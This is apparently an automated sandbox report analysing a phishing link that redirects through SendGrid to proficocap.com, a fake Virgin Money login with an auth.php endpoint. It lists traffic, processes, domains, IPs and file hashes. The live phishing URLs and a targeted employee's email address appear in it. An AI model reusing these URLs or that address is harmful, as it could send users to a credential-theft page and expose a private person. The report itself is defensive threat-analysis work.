    Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
    Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
    Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
    Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
    Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
    Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
    Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
    Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.4:49739 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.4:49742 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.4:49745 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.190.147.8:443 -> 192.168.2.4:49782 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.4:49787 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49793 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.223.35.26:443 -> 192.168.2.4:49794 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.223.35.26:443 -> 192.168.2.4:49795 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.223.35.26:443 -> 192.168.2.4:49797 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.223.35.26:443 -> 192.168.2.4:49796 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.4:49814 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.4:49813 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.4:49810 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.4:49812 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.4:49811 version: TLS 1.2
    Source: classification engineClassification label: mal60.phis.win@20/20@28/12
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1972,i,17134630784947432504,9666418931932445698,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://u48644047.ct.sendgrid.net/ls/click?upn=u001.3irT40U-2BlTtWVjPO1bgMkUPMRV7HMaBj-2FcZe3i1L5jDR7G1Ks0wP9YDqpnyIpxjZeIBaCeYZtGJgliwzSaJhwg-3D-3Dg90K_vPQ7onHR3f0o8KfOdBDFScd6URBvV6dRJTvL1FnCMOJp3bqQS0z8XYrmZvQsYKgv9M18uyN4otj9SHTsh0jVVVuVPoownVxKSao-2Fy-2F5zkA0ggrGoSd-2BVIld1mpIeS3DUcNNIvsq7yFDKM7DHebzUtokLUwZtE0mCsLz1Bm0-2B1LrSQGv4FTM1s6ckzg8R6Atlvbv-2BxwILwC6PQXifnpXLjP04W47PCxVuKYY5jyS-2FXWc-3D"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1972,i,17134630784947432504,9666418931932445698,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
    Browser Extensions
    1
    Process Injection
    1
    Process Injection
    OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
    Ingress Tool Transfer
    Traffic DuplicationData Destruction
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    https://u48644047.ct.sendgrid.net/ls/click?upn=u001.3irT40U-2BlTtWVjPO1bgMkUPMRV7HMaBj-2FcZe3i1L5jDR7G1Ks0wP9YDqpnyIpxjZeIBaCeYZtGJgliwzSaJhwg-3D-3Dg90K_vPQ7onHR3f0o8KfOdBDFScd6URBvV6dRJTvL1FnCMOJp3bqQS0z8XYrmZvQsYKgv9M18uyN4otj9SHTsh0jVVVuVPoownVxKSao-2Fy-2F5zkA0ggrGoSd-2BVIld1mpIeS3DUcNNIvsq7yFDKM7DHebzUtokLUwZtE0mCsLz1Bm0-2B1LrSQGv4FTM1s6ckzg8R6Atlvbv-2BxwILwC6PQXifnpXLjP04W47PCxVuKYY5jyS-2FXWc-3D0%Avira URL Cloudsafe
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    http://webmail.$0%Avira URL Cloudsafe
    https://proficocap.com/favicon.ico0%Avira URL Cloudsafe
    https://proficocap.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_page/v1?ray=8eef48dc28b044050%Avira URL Cloudsafe
    https://proficocap.com/auth.php0%Avira URL Cloudsafe
    https://proficocap.com/cdn-cgi/challenge-platform/h/g/flow/ov1/2103902929:1733530456:gWlw6UrWrF1EVwazpOoHDdN2NPkECb29gam9UES4p7M/8eef48dc28b04405/Lyh2pldR2U_E_.MUR82KipgfyzNT77WVEZwHtUhweWU-1733687428-1.2.1.1-G7.NbYDLguhv11ABpOVb3tBc0A56ETChg8iDEU7elt4XUzrkd1lpQ9Ezh8w9c7jA0%Avira URL Cloudsafe
    https://proficocap.com/0%Avira URL Cloudsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    d26p066pn2w0s0.cloudfront.net
    13.227.8.72
    truefalse
      high
      a.nel.cloudflare.com
      35.190.80.1
      truefalse
        high
        u48644047.ct.sendgrid.net
        167.89.118.28
        truefalse
          unknown
          proficocap.com
          104.21.53.171
          truetrue
            unknown
            cdnjs.cloudflare.com
            104.17.25.14
            truefalse
              high
              challenges.cloudflare.com
              104.18.95.41
              truefalse
                high
                www.google.com
                142.250.181.100
                truefalse
                  high
                  image.thum.io
                  34.202.133.228
                  truefalse
                    high
                    cdn.jsdelivr.net
                    unknown
                    unknownfalse
                      high
                      logo.clearbit.com
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        https://tse1.mm.bing.net/th?id=OADD2.10239402414375_1AVQBVS8V3X3ACPMA&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90false
                          high
                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/608171432:1733530697:8BWsYhk1SWZlRP7GpYN7tPMosN7A_9EHlf49BfqZObo/8eef4911a8e143cb/MZci78iv2CCudpo2.FGQ5mZ5Rf0uaBDJlbj5xATahfU-1733687437-1.1.1.1-orHo8b5s0mjHvI02qYmgkSKS324gw5u9MJx4_q2_vPNFnQ_SCLfrUsZYIz4F5ypFfalse
                            high
                            https://proficocap.com/favicon.icofalse
                            • Avira URL Cloud: safe
                            unknown
                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/rgsuz/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/false
                              high
                              https://logo.clearbit.com/virginmoney.comfalse
                                high
                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8eef4911a8e143cb/1733687444189/TpwymHuahAs5EpNfalse
                                  high
                                  https://proficocap.com/cdn-cgi/challenge-platform/h/g/flow/ov1/2103902929:1733530456:gWlw6UrWrF1EVwazpOoHDdN2NPkECb29gam9UES4p7M/8eef48dc28b04405/Lyh2pldR2U_E_.MUR82KipgfyzNT77WVEZwHtUhweWU-1733687428-1.2.1.1-G7.NbYDLguhv11ABpOVb3tBc0A56ETChg8iDEU7elt4XUzrkd1lpQ9Ezh8w9c7jAfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.cssfalse
                                    high
                                    https://proficocap.com/?__cf_chl_rt_tk=alWt9AgDFfYo2aih2ijenQDb0ivCF8gU6Vb8YAtsw9E-1733687428-1.0.1.1-LkP5f.qskE7jddQD4VSpNDRu53KJfHIimFuUUnj55uQ#grant.ramsden@virginmoney.comfalse
                                      unknown
                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8eef4911a8e143cb&lang=autofalse
                                        high
                                        https://a.nel.cloudflare.com/report/v4?s=NtBqaQHfiWWUjgRK%2FdXcPZXeDWXock6mo7Tw%2BIVyfVw2kgvcR5x%2Fwxet3SMCdTYMH51jspIR7N6pOfuOGkUZomiE9avmM15YSSiJ%2F2N1jYPSIX9If38lpWJ%2FHf9Laam1cw%3D%3Dfalse
                                          high
                                          https://a.nel.cloudflare.com/report/v4?s=BaBa%2Bcls9XuXgYmrVEVw9n%2Bhi9%2F%2BAQrzF8U5ipv6RCLOiYa8iAIomZnG2OE7fSb0hTmYyr8zHA5IYWMJ9z%2BjRGX38WSfY%2Fa54ZhR3f2UUb0bgXN7iYKX3K6%2B1h3zxKm6cQ%3D%3Dfalse
                                            high
                                            https://proficocap.com/true
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://tse1.mm.bing.net/th?id=OADD2.10239399109665_1344PV668L57B53FJ&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90false
                                              high
                                              https://tse1.mm.bing.net/th?id=OADD2.10239385875217_1AS9NW8J4VEXSVA8E&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90false
                                                high
                                                https://a.nel.cloudflare.com/report/v4?s=EYmntC%2FcD10lxgaAhlff%2Ff9ho3LrZqPX0Y6lGu6F%2ByYlSJxmge5No%2FSnJBL2ETxUu9n%2FDGXYTd%2BobgO%2Fx88HKGkiv3%2FN%2BqN1Rz5foS4Klr2rCIoU7ZUd3SpsUyVGb1O2Kw%3D%3Dfalse
                                                  high
                                                  https://proficocap.com/auth.phpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://tse1.mm.bing.net/th?id=OADD2.10239402414374_1RZXN1BFTHNSAZBQY&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90false
                                                    high
                                                    https://proficocap.com/#grant.ramsden@virginmoney.comtrue
                                                      unknown
                                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1false
                                                        high
                                                        https://image.thum.io/get/http://www.virginmoney.comfalse
                                                          high
                                                          https://u48644047.ct.sendgrid.net/ls/click?upn=u001.3irT40U-2BlTtWVjPO1bgMkUPMRV7HMaBj-2FcZe3i1L5jDR7G1Ks0wP9YDqpnyIpxjZeIBaCeYZtGJgliwzSaJhwg-3D-3Dg90K_vPQ7onHR3f0o8KfOdBDFScd6URBvV6dRJTvL1FnCMOJp3bqQS0z8XYrmZvQsYKgv9M18uyN4otj9SHTsh0jVVVuVPoownVxKSao-2Fy-2F5zkA0ggrGoSd-2BVIld1mpIeS3DUcNNIvsq7yFDKM7DHebzUtokLUwZtE0mCsLz1Bm0-2B1LrSQGv4FTM1s6ckzg8R6Atlvbv-2BxwILwC6PQXifnpXLjP04W47PCxVuKYY5jyS-2FXWc-3Dfalse
                                                            unknown
                                                            https://tse1.mm.bing.net/th?id=OADD2.10239385875220_1FZJ7DDRUSKY0IVFA&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90false
                                                              high
                                                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/pat/8eef4911a8e143cb/1733687444189/f6217f608b824ca04203a9dc66ad631785a35b06ac7270e998d764984692a685/R9JS_IJzkoaUp51false
                                                                high
                                                                https://a.nel.cloudflare.com/report/v4?s=HCCGsQvdlNc%2BJmxUPQiMeRCM8982DcflmoYcquVM6726eKfELIICtRripthlRXUSrHio2UGj1gLsOdgH5IGc%2Fr2mwHJN9WyTPSehGdGI7Gpitjf9SdA6Z7qNEFVlIkB3fSg%3Dfalse
                                                                  high
                                                                  https://tse1.mm.bing.net/th?id=OADD2.10239399109664_12R6JVR4SJZQSTHCV&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90false
                                                                    high
                                                                    https://proficocap.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_page/v1?ray=8eef48dc28b04405false
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                                    https://cdn.jsdelivr.net/npm/bootstrapchromecache_132.2.drfalse
                                                                      high
                                                                      https://github.com/twbs/bootstrap/blob/main/LICENSE)chromecache_140.2.drfalse
                                                                        high
                                                                        https://getbootstrap.com/)chromecache_140.2.drfalse
                                                                          high
                                                                          http://webmail.$chromecache_132.2.drfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs
                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          104.21.53.171
                                                                          proficocap.comUnited States
                                                                          13335CLOUDFLARENETUStrue
                                                                          167.89.118.28
                                                                          u48644047.ct.sendgrid.netUnited States
                                                                          11377SENDGRIDUSfalse
                                                                          104.18.95.41
                                                                          challenges.cloudflare.comUnited States
                                                                          13335CLOUDFLARENETUSfalse
                                                                          34.202.133.228
                                                                          image.thum.ioUnited States
                                                                          14618AMAZON-AESUSfalse
                                                                          142.250.181.100
                                                                          www.google.comUnited States
                                                                          15169GOOGLEUSfalse
                                                                          239.255.255.250
                                                                          unknownReserved
                                                                          unknownunknownfalse
                                                                          172.67.215.208
                                                                          unknownUnited States
                                                                          13335CLOUDFLARENETUSfalse
                                                                          13.227.8.72
                                                                          d26p066pn2w0s0.cloudfront.netUnited States
                                                                          16509AMAZON-02USfalse
                                                                          35.190.80.1
                                                                          a.nel.cloudflare.comUnited States
                                                                          15169GOOGLEUSfalse
                                                                          13.227.8.65
                                                                          unknownUnited States
                                                                          16509AMAZON-02USfalse
                                                                          104.17.25.14
                                                                          cdnjs.cloudflare.comUnited States
                                                                          13335CLOUDFLARENETUSfalse
                                                                          IP
                                                                          192.168.2.4
                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                          Analysis ID:1571048
                                                                          Start date and time:2024-12-08 20:49:19 +01:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 3m 3s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:browseurl.jbs
                                                                          Sample URL:https://u48644047.ct.sendgrid.net/ls/click?upn=u001.3irT40U-2BlTtWVjPO1bgMkUPMRV7HMaBj-2FcZe3i1L5jDR7G1Ks0wP9YDqpnyIpxjZeIBaCeYZtGJgliwzSaJhwg-3D-3Dg90K_vPQ7onHR3f0o8KfOdBDFScd6URBvV6dRJTvL1FnCMOJp3bqQS0z8XYrmZvQsYKgv9M18uyN4otj9SHTsh0jVVVuVPoownVxKSao-2Fy-2F5zkA0ggrGoSd-2BVIld1mpIeS3DUcNNIvsq7yFDKM7DHebzUtokLUwZtE0mCsLz1Bm0-2B1LrSQGv4FTM1s6ckzg8R6Atlvbv-2BxwILwC6PQXifnpXLjP04W47PCxVuKYY5jyS-2FXWc-3D
                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                          Number of analysed new started processes analysed:16
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Detection:MAL
                                                                          Classification:mal60.phis.win@20/20@28/12
                                                                          EGA Information:Failed
                                                                          HCA Information:
                                                                          • Successful, ratio: 100%
                                                                          • Number of executed functions: 0
                                                                          • Number of non-executed functions: 0
                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                                          • Excluded IPs from analysis (whitelisted): 216.58.208.227, 172.217.19.238, 64.233.162.84, 172.217.17.46, 199.232.214.172, 192.229.221.95, 172.217.17.35, 104.18.186.31, 104.18.187.31, 142.250.181.138, 142.250.181.42, 142.250.181.106, 172.217.19.234, 172.217.17.42, 172.217.17.74, 172.217.19.202, 172.217.19.170
                                                                          • Excluded domains from analysis (whitelisted): cdn.jsdelivr.net.cdn.cloudflare.net, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, tse1.mm.bing.net, clientservices.googleapis.com, arc.msn.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, login.live.com, update.googleapis.com, clients.l.google.com
                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                          • VT rate limit hit for: https://u48644047.ct.sendgrid.net/ls/click?upn=u001.3irT40U-2BlTtWVjPO1bgMkUPMRV7HMaBj-2FcZe3i1L5jDR7G1Ks0wP9YDqpnyIpxjZeIBaCeYZtGJgliwzSaJhwg-3D-3Dg90K_vPQ7onHR3f0o8KfOdBDFScd6URBvV6dRJTvL1FnCMOJp3bqQS0z8XYrmZvQsYKgv9M18uyN4otj9SHTsh0jVVVuVPoownVxKSao-2Fy-2F5zkA0ggrGoSd-2BVIld1mpIeS3DUcNNIvsq7yFDKM7DHebzUtokLUwZtE0mCsLz1Bm0-2B1LrSQGv4FTM1s6ckzg8R6Atlvbv-2BxwILwC6PQXifnpXLjP04W47PCxVuKYY5jyS-2FXWc-3D
                                                                          No simulations
                                                                          No context
                                                                          No context
                                                                          No context
                                                                          No context
                                                                          No context
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:HTML document, ASCII text, with CRLF line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):9593
                                                                          Entropy (8bit):4.469873970610483
                                                                          Encrypted:false
                                                                          SSDEEP:96:1PEwwFGFBT7efeT5N7466rAj1Svzhsp8ZwaaVnP39vfeLiBnD:1PEwNT7eGNO66r1sp8tenPVfCiBD
                                                                          MD5:B33EF79C7D3789C89E8DB314DEDCD7C5
                                                                          SHA1:83C0D0EDB2AFC5114018A4275EF83A2E76027C92
                                                                          SHA-256:7610F141670EBA8099FDC321F084EEFFE54840C73B0937456A47ED445AC487ED
                                                                          SHA-512:0148BAEBBD367143F3E50D001FE12D068CCDD29993FE8DBCA09F2F3347673AE6208F0DDE3AED84DC283F4F50C922988EAD8DFB439F47059AB4337024725E750F
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://proficocap.com/
                                                                          Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title></title>.. <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/css/bootstrap.min.css" rel="stylesheet">.. <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css" rel="stylesheet">.. <style>.. #background-container {.. position: fixed;.. top: 0;.. left: 0;.. width: 100%;.. height: 100%;.. background-size: cover;.. background-position: center;.. background-repeat: no-repeat;.. filter: blur(5px);.. }.. #overlay {.. position: fixed;.. top: 0;.. left: 0;.. width: 100%;.. height: 100%;.. background-color: rgba(0, 0, 0, 0.5);.. }.. .login-container {.. max-width: 400px
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (47691)
                                                                          Category:downloaded
                                                                          Size (bytes):47692
                                                                          Entropy (8bit):5.401573598696506
                                                                          Encrypted:false
                                                                          SSDEEP:768:IXCtQmIutwVHBzZBF6gmXLSOzQDjdadOQbk6sgEvxm7b39tobLKZUvnw81KZLGcD:IGJWHBzZBF6xbGeLsVvQ33FUvDW
                                                                          MD5:B0B3774E70E752266B4CF190E6D95053
                                                                          SHA1:03823D33D8C374DD69B66F1D75A5FC93D29967E1
                                                                          SHA-256:A9F0787E39291D7BCB873D0D514F1D2C8DB0256FD741C2ABC4D46A809254E141
                                                                          SHA-512:8060AA547C3F32930EC2A3786A6BB15054F396D8EAB238EA34E881C2EEAE0D013AF246FDDE85DA8A5BFC2690B1EB26E5138B45BAA28479264DB3BA458D4055A8
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://challenges.cloudflare.com/turnstile/v0/g/f9063374b04d/api.js?onload=fjGVd3&render=explicit
                                                                          Preview:"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                          Category:downloaded
                                                                          Size (bytes):61
                                                                          Entropy (8bit):3.990210155325004
                                                                          Encrypted:false
                                                                          SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                          MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                          SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                          SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
